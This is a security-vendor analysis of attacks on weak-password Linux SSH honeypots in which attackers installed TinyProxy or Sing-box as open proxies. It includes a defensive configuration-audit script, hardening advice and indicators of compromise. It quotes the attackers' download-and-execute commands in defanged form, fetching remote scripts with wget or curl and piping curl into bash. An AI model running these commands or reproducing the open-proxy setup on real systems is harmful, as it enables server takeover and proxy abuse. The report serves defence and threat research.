Analysis of Attacks Targeting Linux SSH Servers for Proxy Installation

AhnLab SEcurity intelligence Center (ASEC) uses honeypots to monitor attacks targeting poorly managed Linux servers. One of the representative honeypots is an SSH service configured with weak credentials, which is targeted by a large number of DDoS and coinminer attackers.

ASEC has identified cases where Linux servers were attacked to install proxies. In each case, TinyProxy or Sing-box was installed. No other attack logs were found except for the installation of TinyProxy or Sing-box. It appears that the attackers aim to use the infected systems as proxy nodes.


1. Case of Installing TinyProxy

The attacker attempted to log in to the honeypot Linux server and, upon successful login, downloaded and executed a malicious Bash script using the following command.

# (wget -O s.sh hxxps://0x0[.]st/8VDs.sh || curl -o s.sh hxxps://0x0[.]st/8VDs.sh) && chmod +x s.sh && sh s.sh

Figure 1. Malicious Bash Script with Polish Comments

The Bash script first installs TinyProxy using apt, yum, or dnf according to the OS environment. It manipulates the configuration file to allow external connections and maintains persistence.

Figure 2. Setting and Preserving TinyProxy

Specifically, the script deletes the access control rules starting with Allow and Deny in the TinyProxy configuration file, “/etc/tinyproxy/tinyproxy.conf” or “/etc/tinyproxy.conf,” and adds the rule “Allow 0.0.0.0/0.” This rule allows unrestricted access from external sources. Consequently, attackers can connect to port 8888, which the TinyProxy service uses, and abuse the infected system as a proxy.

Figure 3. Commented and Inserted TinyProxy Configuration
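As an added defender-side example (not part of the ASEC write-up or of the attacker's script), the following POSIX shell check flags the tampering described above in a tinyproxy.conf. The sample configuration files are constructed for the demonstration, and the treatment of a configuration with no Allow directive as open relies on TinyProxy's documented behaviour that such a configuration accepts every client.

```shell
#!/bin/sh
# Added example: audit a tinyproxy.conf for the access-control tampering
# described in the TinyProxy case (Allow/Deny lines removed, "Allow 0.0.0.0/0"
# inserted). Returns 0 when client access is restricted, 1 when the proxy is
# open to the whole Internet, 2 when the file cannot be read.
audit_tinyproxy_conf() {
    conf="$1"
    [ -r "$conf" ] || { echo "cannot read $conf" >&2; return 2; }
    # Drop comments, keep only effective Allow/Deny directives.
    rules=$(sed -e 's/#.*$//' "$conf" \
        | grep -Ei '^[[:space:]]*(Allow|Deny)[[:space:]]+' || true)
    if printf '%s\n' "$rules" | grep -Eiq '^[[:space:]]*Allow[[:space:]]+0\.0\.0\.0/0'; then
        echo "OPEN: $conf allows 0.0.0.0/0 (matches the tampered configuration)"
        return 1
    fi
    if ! printf '%s\n' "$rules" | grep -Eiq '^[[:space:]]*Allow[[:space:]]+'; then
        # TinyProxy documents that with no Allow/Deny lines all clients are accepted.
        echo "OPEN: $conf has no Allow rule; every client is accepted"
        return 1
    fi
    echo "OK: $conf restricts clients"
    return 0
}

# Constructed sample configurations (not taken from the incident).
TMPD=$(mktemp -d)
cat > "$TMPD/default.conf" <<'EOF'
Port 8888
# Default-style access control: loopback only
Allow 127.0.0.1
Allow ::1
EOF
cat > "$TMPD/tampered.conf" <<'EOF'
Port 8888
#Allow 127.0.0.1
#Allow ::1
Allow 0.0.0.0/0
EOF
cat > "$TMPD/noallow.conf" <<'EOF'
Port 8888
Deny 10.0.0.5
EOF

for f in default tampered noallow; do
    audit_tinyproxy_conf "$TMPD/$f.conf" || true
done
```

Run it against the two paths named above on a suspected host; a non-zero exit on either file is worth correlating with a listener on port 8888.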


2. Sing-box Installation Case

The following is an attack case in which a proxy tool named Sing-box was installed. The attacker installed Sing-box using the following commands.

# ls
# whoami
# sudo su
# apt
# bash
# sudo apt
# lscpu
# free -h
# clear
# cat /etc/os-release
# sudo apt-get update
# sudo -s
# head -n 1 /etc/issue
# uname -a
# which curl
# which python3
# ls /usr/bin | grep python
# bash <(curl -Ls hxxps://raw.githubusercontent[.]com/eooce/sing-box/main/sing-box.sh)
# bash 1
# bah
# curl 
# curl -fsSL hxxps://raw.githubusercontent[.]com/eooce/ssh_tool/main/ssh_tool.sh -o ssh_tool.sh && chmod +x ssh_tool.sh && ./ssh_tool.sh
# curl –help
# curl -L hxxps://raw.githubusercontent[.]com/eooce/ssh_tool/main/ssh_tool.sh -o ssh_tool.sh
# which wget
# wget hxxps://raw.githubusercontent[.]com/eooce/ssh_tool/main/ssh_tool.sh -O ssh_tool.sh

Sing-box is a tool that installs a multipurpose proxy supporting the vmess-argo, vless-reality, Hysteria2, and TUICv5 protocols. According to its GitHub page, the open-source tool can be installed to unblock ChatGPT and Netflix. The author seems to have created Sing-box to bypass blocking in countries where such services are not available. In other words, if Sing-box is installed on a Virtual Private Server (VPS) located overseas and used as a proxy, the services can be accessed using the four bypass protocols supported by Sing-box. In this case, however, the attacker gained unauthorized access to others’ systems to install Sing-box, and it appears that the attacker intended to use it for illegal or profit-making purposes.

Figure 4. Sing-box GitHub Page


3. Conclusion

Recently, there have been confirmed cases of proxies being installed on poorly managed Linux servers. A notable characteristic is the abuse of legitimate tools—such as TinyProxy or open-source software like Sing-box—rather than traditional proxy malware. Attackers can use the infected system as a proxy to conceal their origin in other attacks or sell access to the proxy node for criminal profit.

Accordingly, administrators must use passwords that are difficult to guess and change them periodically to protect Linux servers from brute-force and other password-guessing attacks. They also need to patch to the latest version to prevent vulnerability exploitation and use security products such as firewalls to control access to servers that are exposed to the public. Lastly, they should update V3 to the latest version to prevent malware infections in advance.


MD5

16d1dfa35d64046128290393512171ce
35d79027834a3b6270455f59b54f2e19
URL

https[:]//0x0[.]st/8VDs[.]sh
https[:]//raw[.]githubusercontent[.]com/eooce/sing-box/main/sing-box[.]sh